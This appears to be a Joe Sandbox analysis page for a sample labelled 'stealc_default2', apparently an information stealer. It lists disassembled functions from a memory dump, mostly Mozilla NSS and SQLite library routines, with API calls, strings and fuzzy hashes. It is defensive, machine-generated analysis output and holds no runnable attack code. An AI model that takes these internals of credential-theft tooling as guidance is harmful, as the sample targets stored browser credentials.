Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: d1df15ac23019ad54fe4e276eccd755ba916121b51138cc23d5bebc8378e4584
Instruction ID: 6a6d9a99c5e65ab675aebee4c45e7398dadbcb9ffea9291eafebba8da181541c
Opcode Fuzzy Hash: d1df15ac23019ad54fe4e276eccd755ba916121b51138cc23d5bebc8378e4584
Instruction Fuzzy Hash: 148171B5A002059FEB24CF59DE80B6B77F5FF88388F144828E92597B51D731E816CBA1

Function 6C8FCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C8FC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C8FDAE2,?), ref: 6C8FC6C2

PR_Now.NSS3 ref: 6C8FCD35

Part of subcall function 6C959DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C9A0A27), ref: 6C959DC6
Part of subcall function 6C959DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C9A0A27), ref: 6C959DD1
Part of subcall function 6C959DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C959DED

Part of subcall function 6C8E6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C891C6F,00000000,00000004,?,?), ref: 6C8E6C3F

PR_GetCurrentThread.NSS3 ref: 6C8FCD54

Part of subcall function 6C959BF0: TlsGetValue.KERNEL32(?,?,?,6C9A0A75), ref: 6C959C07

Part of subcall function 6C8E7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C891CCC,00000000,00000000,?,?), ref: 6C8E729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C8FCD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C8FCE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C8FCE2C

Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C8FCE40

Part of subcall function 6C8F14C0: TlsGetValue.KERNEL32 ref: 6C8F14E0
Part of subcall function 6C8F14C0: EnterCriticalSection.KERNEL32 ref: 6C8F14F5
Part of subcall function 6C8F14C0: PR_Unlock.NSS3 ref: 6C8F150D

Part of subcall function 6C8FCEE0: PORT_ArenaMark_Util.NSS3(?,6C8FCD93,?), ref: 6C8FCEEE
Part of subcall function 6C8FCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C8FCD93,?), ref: 6C8FCEFC
Part of subcall function 6C8FCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C8FCD93,?), ref: 6C8FCF0B
Part of subcall function 6C8FCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C8FCD93,?), ref: 6C8FCF1D

Part of subcall function 6C8FCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C8FCD93,?), ref: 6C8FCF47
Part of subcall function 6C8FCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C8FCD93,?), ref: 6C8FCF67
Part of subcall function 6C8FCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C8FCD93,?,?,?,?,?,?,?,?,?,?,?,6C8FCD93,?), ref: 6C8FCF78

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 00e5c3c96a91cbf653e7832a75408e27d127fed4c75e16b62cb27d48d19eb25f
Instruction ID: 7bef70c64863da30a5fc37b0b4f60cb0b92680d7cd07f0087f846ca0cd3bcc3b
Opcode Fuzzy Hash: 00e5c3c96a91cbf653e7832a75408e27d127fed4c75e16b62cb27d48d19eb25f
Instruction Fuzzy Hash: D351C5B6E001049BE730EF69DD40B9A77F4AF58388F250934D965DB742EB31EA06CB91

Function 6C8CEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C8CEF38

Part of subcall function 6C8B9520: PK11_IsLoggedIn.NSS3(00000000,?,6C8E379E,?,00000001,?), ref: 6C8B9542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C8CEF53

Part of subcall function 6C8D4C20: TlsGetValue.KERNEL32 ref: 6C8D4C4C
Part of subcall function 6C8D4C20: EnterCriticalSection.KERNEL32(?), ref: 6C8D4C60
Part of subcall function 6C8D4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D4CA1
Part of subcall function 6C8D4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C8D4CBE
Part of subcall function 6C8D4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D4CD2
Part of subcall function 6C8D4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D4D3A

PR_GetCurrentThread.NSS3 ref: 6C8CEF9E

Part of subcall function 6C959BF0: TlsGetValue.KERNEL32(?,?,?,6C9A0A75), ref: 6C959C07

free.MOZGLUE(00000000), ref: 6C8CEFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C8CF016
free.MOZGLUE(00000000), ref: 6C8CF022

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: e27a5ab89be47220161fa040af57bf0009b1c3f2f9495f2fe75e575a47ad151f
Instruction ID: 6c74a26d47ab184f438b42b66e754e4f1cb8a67ba9b3e49fea2d977536723379
Opcode Fuzzy Hash: e27a5ab89be47220161fa040af57bf0009b1c3f2f9495f2fe75e575a47ad151f
Instruction Fuzzy Hash: 7141B0B1E00209ABEF118FA9DD85BEE7BB9AF58358F004425F914A6350E771C9158BA2

Function 6C890E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C890A2C), ref: 6C890E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C890A2C), ref: 6C890E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C890A2C), ref: 6C890E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C890A2C), ref: 6C890E90
free.MOZGLUE(00000000), ref: 6C890EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C890A2C), ref: 6C890ED9

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 1b3d20eda8b9ce3b75823084fd996779c6b7da3fe704233c7f4b44a5bd06d251
Instruction ID: aca05be2cbff700092147658e70c294d82e50f481022e5e089622c158d932aad
Opcode Fuzzy Hash: 1b3d20eda8b9ce3b75823084fd996779c6b7da3fe704233c7f4b44a5bd06d251
Instruction Fuzzy Hash: E3213EB2E002885BEF30496D9E85B6F76AEDFD9748F190C35D81C97A02EB60C81582A1

Function 6C91EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C91EE85
realloc.MOZGLUE(55252F9C,?), ref: 6C91EEAE
PORT_Alloc_Util.NSS3(?), ref: 6C91EEC5

Part of subcall function 6C8F0BE0: malloc.MOZGLUE(6C8E8D2D,?,00000000,?), ref: 6C8F0BF8
Part of subcall function 6C8F0BE0: TlsGetValue.KERNEL32(6C8E8D2D,?,00000000,?), ref: 6C8F0C15

htonl.WSOCK32(?), ref: 6C91EEE3
htonl.WSOCK32(00000000,?), ref: 6C91EEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C91EF01

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: 936afd98ba49b40c09adb3d468adbd2885f5d84b4177d248eab6b7e2b2f6d681
Instruction ID: 47f5c88ad3d4b9051141e18a8547f650564bd544b0e59465bf021db3f8845be0
Opcode Fuzzy Hash: 936afd98ba49b40c09adb3d468adbd2885f5d84b4177d248eab6b7e2b2f6d681
Instruction Fuzzy Hash: 6E21E731A042289FCF109F28DC85B5A77A8EF49758F148129EC199BF41D730EC15CBE6

Function 6C8E5ED0 Relevance: 9.1, APIs: 6, Instructions: 80stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C8E5D71), ref: 6C8E5F0A
TlsGetValue.KERNEL32 ref: 6C8E5F1F
EnterCriticalSection.KERNEL32(89000904), ref: 6C8E5F2F
PR_Unlock.NSS3(890008E8), ref: 6C8E5F55
PR_SetError.NSS3(00000000,00000000), ref: 6C8E5F6D
SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6C8E5F7D

Part of subcall function 6C8E5220: TlsGetValue.KERNEL32(00000000,890008E8,?,6C8E5F82,8B4274C0), ref: 6C8E5248
Part of subcall function 6C8E5220: EnterCriticalSection.KERNEL32(0F6C9B0D,?,6C8E5F82,8B4274C0), ref: 6C8E525C
Part of subcall function 6C8E5220: PR_SetError.NSS3(00000000,00000000), ref: 6C8E528E
Part of subcall function 6C8E5220: PR_Unlock.NSS3(0F6C9AF1), ref: 6C8E5299
Part of subcall function 6C8E5220: free.MOZGLUE(00000000), ref: 6C8E52A9

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
String ID:
API String ID: 3150690610-0
Opcode ID: 9c56de77ab74d59256afb25cebfe0ce5b3a722ce4ea80853eecde86bf5d7d1ba
Instruction ID: dc5419ce0b13cd447e9b533b701a9b7509d093b6dd80768f3500b69b5121e033
Opcode Fuzzy Hash: 9c56de77ab74d59256afb25cebfe0ce5b3a722ce4ea80853eecde86bf5d7d1ba
Instruction Fuzzy Hash: AC21E7B5D042049FDB10AF68ED41AEEB7B4EF19318F540439E90AA7700EB31E954CBD1

Function 6C923C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C925B40: PR_GetIdentitiesLayer.NSS3 ref: 6C925B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C923D3F

Part of subcall function 6C89BA90: PORT_NewArena_Util.NSS3(00000800,6C923CAF,?), ref: 6C89BABF
Part of subcall function 6C89BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C923CAF,?), ref: 6C89BAD5
Part of subcall function 6C89BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C923CAF,?), ref: 6C89BB08
Part of subcall function 6C89BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C923CAF,?), ref: 6C89BB1A
Part of subcall function 6C89BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C923CAF,?), ref: 6C89BB3B

PR_EnterMonitor.NSS3(?), ref: 6C923CCB

Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C9590AB
Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C9590C9
Part of subcall function 6C959090: EnterCriticalSection.KERNEL32 ref: 6C9590E5
Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C959116
Part of subcall function 6C959090: LeaveCriticalSection.KERNEL32 ref: 6C95913F

PR_EnterMonitor.NSS3(?), ref: 6C923CE2
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C923CF8
PR_ExitMonitor.NSS3(?), ref: 6C923D15
PR_ExitMonitor.NSS3(?), ref: 6C923D2E

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
String ID:
API String ID: 4030862364-0
Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction ID: bb797e59a1b085d879081c3cba19b9fbb928907d37d45fd96e8bfe6177bc8204
Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction Fuzzy Hash: 911108B56216006FE7209E79EC417ABB2ECBB21308F500534E59A87B24E736E82DC652

Function 6C8EFDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C8EFE08

Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C8EFE1D

Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F116E

PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C8EFE29
PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C8EFE3D
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C8EFE62
free.MOZGLUE(00000000,?,?,?,?), ref: 6C8EFE6F

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 660648399-0
Opcode ID: 6ec8752f1191e1fcdbaabd8faa8c5bb1b8ec90f93d47f9b5fddc114ed8c2246a
Instruction ID: 2187d9adac48426c8653f4c2bc6f677619178d787008b2cec72fd95d85da743d
Opcode Fuzzy Hash: 6ec8752f1191e1fcdbaabd8faa8c5bb1b8ec90f93d47f9b5fddc114ed8c2246a
Instruction Fuzzy Hash: 67110CB66002066BEB204F58FD40E5B7398AF6D299F148434ED2C9BB52E731F914C791

Function 6C99FD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

PR_Lock.NSS3 ref: 6C99FD9E

Part of subcall function 6C959BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C881A48), ref: 6C959BB3
Part of subcall function 6C959BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C881A48), ref: 6C959BC8

PR_WaitCondVar.NSS3(000000FF), ref: 6C99FDB9

Part of subcall function 6C87A900: TlsGetValue.KERNEL32(00000000,?,6C9F14E4,?,6C814DD9), ref: 6C87A90F
Part of subcall function 6C87A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C87A94F

PR_Unlock.NSS3 ref: 6C99FDD4
PR_Lock.NSS3 ref: 6C99FDF2
PR_NotifyAllCondVar.NSS3 ref: 6C99FE0D
PR_Unlock.NSS3 ref: 6C99FE23

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
String ID:
API String ID: 3365241057-0
Opcode ID: cfbcda9ffc74633ec5a73a08da6d60d8bc12c9789824c7ec673ffd3f04853d2f
Instruction ID: f7fdce74dacd948e25a29bb828a8c3009d8be719da7f1c74871892ac8c3372fd
Opcode Fuzzy Hash: cfbcda9ffc74633ec5a73a08da6d60d8bc12c9789824c7ec673ffd3f04853d2f
Instruction Fuzzy Hash: 34018EF6A046019BDF158F55FC008457B21AB6226C7294374E83A47BA1E722E929C7C1

Function 6C87AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C87AFDA

Strings

unable to delete/modify collation sequence due to active statements, xrefs: 6C87AF5C
%s at line %d of [%.10s], xrefs: 6C87AFD3
misuse, xrefs: 6C87AFCE
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C87AFC4

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 53f5c66824ba8544ec0468b321a1ff4080a2b1c75224a9964bbe09c858af968c
Instruction ID: adf269e8a5672b81b316502c7451706a135127a205ab8072d4562f9cecede8b4
Opcode Fuzzy Hash: 53f5c66824ba8544ec0468b321a1ff4080a2b1c75224a9964bbe09c858af968c
Instruction Fuzzy Hash: F991D275A042158FDB24CF59C994AEEB7F1AF45314F1948A8E865AB791E334EC01CB70

Function 6C8DFC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C8DFC55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8DFCB2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C8DFDB7
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C8DFDDE

Part of subcall function 6C8E8800: TlsGetValue.KERNEL32(?,6C8F085A,00000000,?,6C898369,?), ref: 6C8E8821
Part of subcall function 6C8E8800: TlsGetValue.KERNEL32(?,?,6C8F085A,00000000,?,6C898369,?), ref: 6C8E883D
Part of subcall function 6C8E8800: EnterCriticalSection.KERNEL32(?,?,?,6C8F085A,00000000,?,6C898369,?), ref: 6C8E8856
Part of subcall function 6C8E8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C8E8887
Part of subcall function 6C8E8800: PR_Unlock.NSS3(?,?,?,?,6C8F085A,00000000,?,6C898369,?), ref: 6C8E8899

Strings

pkcs11:, xrefs: 6C8DFC4F

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
String ID: pkcs11:
API String ID: 362709927-2446828420
Opcode ID: 724dd22caf1fb653aa5ed458e1cd1f56ac7a0f99bceb764a1c118a8efc513394
Instruction ID: 8d1f5ac853734f1e39f665296730900b3f14c47ca22f059d6da0dc408536a578
Opcode Fuzzy Hash: 724dd22caf1fb653aa5ed458e1cd1f56ac7a0f99bceb764a1c118a8efc513394
Instruction Fuzzy Hash: 995104B1A041719BEB308F28AF40B5A3375AF65359F270825DD089BB41EB30F914EB92

Function 6C81BDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(00000000,?,?), ref: 6C81BE02

Part of subcall function 6C949C40: memcmp.VCRUNTIME140(?,00000000,6C81C52B), ref: 6C949D53

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C81BE9F

Strings

%s at line %d of [%.10s], xrefs: 6C81BE98
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C81BE89
database corruption, xrefs: 6C81BE93

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
